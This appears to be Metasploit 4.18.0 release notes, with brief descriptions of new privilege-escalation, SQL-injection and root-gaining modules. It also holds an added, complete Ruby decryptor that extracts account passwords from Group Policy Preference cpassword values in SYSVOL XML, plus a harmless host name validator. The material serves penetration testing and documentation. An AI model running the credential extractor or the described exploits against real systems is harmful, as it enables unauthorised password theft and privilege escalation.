Sep 13, 2020
4.18.0

Improved

  • Pro: We improved the designation of hosts with "Unknown" operating systems in Passive Network Discovery PDF reports.
  • PR 13919 - Auxiliary modules that expose actions now allow those actions to be invoked directly as commands once the user has entered the module's context with the use command in msfconsole.
  • PR 13980 - Added a new Reflective PE file loader as a payload stage, enabling users to specify an arbitrary EXE or DLL and have it injected into the target process and executed as the payload stage, without first recompiling it for compatibility with a reflective loader such as ReflectiveDLLInjection.
  • PR 14021 - Updated the module search functionality to only return results where all provided text search terms match. Example: search postgresql login will only return modules matching both postgresql and login.
  • PR 14040 - Updated the exploit/multi/misc/java_rmi_server module to provide a check method, which reuses the detection logic of auxiliary/scanner/misc/java_rmi_server.
  • PR 14053 - Improved the info command such that, following a module search, it is now possible to use info to view a specific module's information.
  • PR 14062 - Added a SECURITY.md file to the Metasploit Framework so that users who discover security issues know how those issues can/should be reported to the project maintainers. This file will be rendered through the GitHub interface, as it follows the standard naming convention.
  • PR 14065 - Reduced msfconsole boot time a bit by lazily loading the faker module, which is unneeded at bootup and is only used in a few limited scenarios.
  • PR 14068 - Updated the auxiliary/scanner/smb/smb_enum_gpp module to use RubySMB instead of the old Rex client, allowing support for SMB versions 1-3.
  • PR 14072 - Improved the Python method for shell interaction by updating the PTY shim to be Python 3 compatible. Also fixed the technique in environments where the python3 binary is available and in the PATH, but the python binary is not.
  • PR 14075 - Updated exploits/multi/fileformat/zip_slip to support generating ZIP files.
  • PR 14083 - Updated post/windows/gather/enum_patches to additionally report when patches were installed on a Windows target.
  • PR 14089 - Updated auxiliary/scanner/smb/smb_version for backwards compatibility with older Ruby versions.
  • PR 14090 - Added an example of using info on the output of the search command.
  • PR 14106 - Updated the search command to always show an additional note on how to interact with the search results.
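The auxiliary/scanner/smb/smb_enum_gpp module ported to RubySMB in PR 14068 looks for Group Policy Preference XML files in SYSVOL and recovers the passwords stored in their cpassword attributes. The following is an added illustration of that recovery step, written for this page and not taken from the module or from Rapid7; it uses the AES-256 key Microsoft published for cpassword (MS-GPPREF, zero IV), and the Groups.xml it parses is a constructed sample, not a capture.

```ruby
require 'openssl'
require 'base64'
require 'rexml/document'

# AES-256 key that Microsoft published for GPP cpassword values (MS-GPPREF);
# the IV is sixteen zero bytes. Both are public, which is why a cpassword
# is effectively plaintext to anyone who can read SYSVOL.
GPP_KEY = ['4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'].pack('H*')
GPP_IV  = ("\x00" * 16).b

# Decrypt one cpassword attribute value and return the password as UTF-8.
def decrypt_cpassword(cpassword)
  # GPP writes base64 without '=' padding; restore it or strict decoding fails.
  padded = cpassword + ('=' * ((4 - cpassword.length % 4) % 4))
  cipher = OpenSSL::Cipher.new('aes-256-cbc')
  cipher.decrypt
  cipher.key = GPP_KEY
  cipher.iv  = GPP_IV
  plain = cipher.update(Base64.strict_decode64(padded)) + cipher.final
  # Windows stores the plaintext as UTF-16LE.
  plain.force_encoding('UTF-16LE').encode('UTF-8')
end

# Inverse operation, present only to build the constructed sample below.
def encrypt_cpassword(password)
  cipher = OpenSSL::Cipher.new('aes-256-cbc')
  cipher.encrypt
  cipher.key = GPP_KEY
  cipher.iv  = GPP_IV
  data = cipher.update(password.encode('UTF-16LE').b) + cipher.final
  Base64.strict_encode64(data).delete('=')
end

# The attribute naming the account differs per preference type: Groups.xml uses
# userName, ScheduledTasks.xml runAs, Services.xml accountName, DataSources.xml username.
ACCOUNT_ATTRS = %w[userName runAs accountName username].freeze

# Walk every Properties element carrying a cpassword and return account/password pairs.
def extract_gpp_credentials(xml)
  doc = REXML::Document.new(xml)
  creds = []
  doc.elements.each('//Properties[@cpassword]') do |props|
    cp = props.attributes['cpassword'].to_s
    next if cp.empty? # an empty cpassword means no password was set, not an empty password
    account = ACCOUNT_ATTRS.map { |a| props.attributes[a] }.compact.first
    creds << { user: account, password: decrypt_cpassword(cp) }
  end
  creds
end

# Constructed sample (not a real capture) of a Groups.xml as it would sit under
# \\<domain>\SYSVOL\<domain>\Policies\<GUID>\Machine\Preferences\Groups\Groups.xml
SAMPLE_CPASSWORD = encrypt_cpassword('Local*P4ssword!')
SAMPLE_GROUPS_XML = <<~XML
  <?xml version="1.0" encoding="utf-8"?>
  <Groups>
    <User name="LocalAdmin" image="2" changed="2020-09-01 10:00:00">
      <Properties action="U" newName="" fullName="" description="Local admin pushed by GPP"
                  cpassword="#{SAMPLE_CPASSWORD}" changeLogon="0" noChange="1"
                  neverExpires="1" acctDisabled="0" userName="LocalAdmin"/>
    </User>
    <User name="NoPassword" image="2" changed="2020-09-01 10:00:00">
      <Properties action="U" cpassword="" userName="NoPassword"/>
    </User>
  </Groups>
XML

if $PROGRAM_NAME == __FILE__
  extract_gpp_credentials(SAMPLE_GROUPS_XML).each do |c|
    puts "#{c[:user]}: #{c[:password]}"
  end
end
```

Two details matter in practice: the base64 in the XML is unpadded, so a strict decoder needs the padding restored, and the decrypted bytes are UTF-16LE, so a password containing non-ASCII characters comes out wrong if it is treated as UTF-8. Microsoft removed the ability to set cpassword in 2014 (MS14-025), but existing XML files in SYSVOL are left in place, which is why the module still finds them.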

Fixed

  • Pro: We fixed an issue where invalid project XML exports would occur when certain characters were present within the project name. Project attributes are now properly XML encoded to ensure valid XML generation on project export.
  • Pro: We fixed an issue where Web Application testing would offer detected aliases which were not DNS compliant as virtual host targets. Only DNS compliant detected aliases are now offered as virtual target hosts by Web Application testing.
  • Pro: We fixed an issue when exporting project data as a Zip archive, where the export was failing to complete under some circumstances. We also fixed an issue with project import of Zip data failing to correctly import. Both operations should now function as expected.
  • PR 14050 - Fixed an issue with db_import when attempting to import project Zip files exported by Metasploit Pro.
  • PR 14061 - Fixed a performance regression in msfvenom, reducing msfvenom loading time by loading only the relevant module sets for the command being performed.
  • PR 14064 - Fixed HTML module documentation generated from module content, where OSVDB links were broken and some CVE links were missing. CVE links should all now be present and OSVDB entries display their number but are now unlinked.
  • PR 14099 - Fixed the user PowerShell profile path in post/windows/gather/enum_powershell_env when targeting newer versions of Windows.
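The Web Application testing fix above only offers DNS-compliant aliases as virtual host targets. As an added example written for this page (not Pro's own validation code), the following applies the RFC 1123 host name rules to a constructed list of detected aliases; the sample names and the helper names are assumptions.

```ruby
# RFC 1123 host label: 1-63 characters, letters, digits and hyphens,
# no leading or trailing hyphen (a leading digit is allowed).
HOSTNAME_LABEL = /\A[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\z/i

# True when a detected alias can legitimately appear as a DNS host name and
# therefore as an HTTP Host header / virtual host target.
def dns_compliant?(alias_name)
  return false if alias_name.nil?
  name = alias_name.strip.chomp('.') # a single trailing dot (FQDN form) is fine
  return false if name.empty? || name.length > 253
  # split with -1 keeps empty labels, so "a..b" and ".example.com" are rejected
  name.split('.', -1).all? { |label| HOSTNAME_LABEL.match?(label) }
end

# Reduce a list of detected aliases to the normalised, de-duplicated set
# that should be offered as virtual host targets.
def vhost_candidates(aliases)
  aliases.select { |a| dns_compliant?(a) }
         .map    { |a| a.strip.chomp('.').downcase }
         .uniq
end

# Constructed sample of aliases as a discovery step might report them.
SAMPLE_ALIASES = [
  'WWW.Example.com',      # accepted, normalised to lowercase
  'www.example.com.',     # same host in FQDN form, de-duplicated
  'intranet_server',      # underscore is not valid in a host name
  '*.example.com',        # wildcard certificate SAN, not a host
  'www.example.com:8080', # host plus port is not a host name
  '-bad.example.com',     # a label may not start with a hyphen
  'portal.example.com'
].freeze

if $PROGRAM_NAME == __FILE__
  puts vhost_candidates(SAMPLE_ALIASES)
end
```

Note that an IP literal such as 10.0.0.5 passes this syntax test, because RFC 1123 allows all-digit labels; if only name-based virtual hosts are wanted, filter IP addresses out separately.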

Modules

  • PR 12983 - New module exploits/windows/local/dnsadmin_serverlevelplugindll achieves local privilege escalation on Windows Server 2003 and later targets, gaining SYSTEM level code execution if the current user is a member of the DnsAdmins group and also has permissions to restart the DNS service.
  • PR 13836 - New module auxiliary/scanner/scada/modbus_banner_grabbing scans targets running the Modbus protocol and performs banner grabbing, saving returned information (which can include manufacturer, model number, etc.) as a note.
  • PR 13847 - New gather module auxiliary/gather/peplink_bauth_sqli takes advantage of CVE-2017-8835, using SQL injection against Peplink target devices running firmware before 7.0.1 to hijack a logged-in user's account and extract configuration details (including the device license key). This module utilizes extended mixin support for SQLite provided through a GSoC student contribution.
  • PR 13992 - New module exploits/osx/local/cfprefsd_race_condition leverages a race condition that allows arbitrary trusted file write (CVE-2020-9839), exploiting this to gain root by overwriting the /etc/pam.d/login file to allow a root login without a password, logging in without a password, and then returning the file to its original state after gaining root permissions.
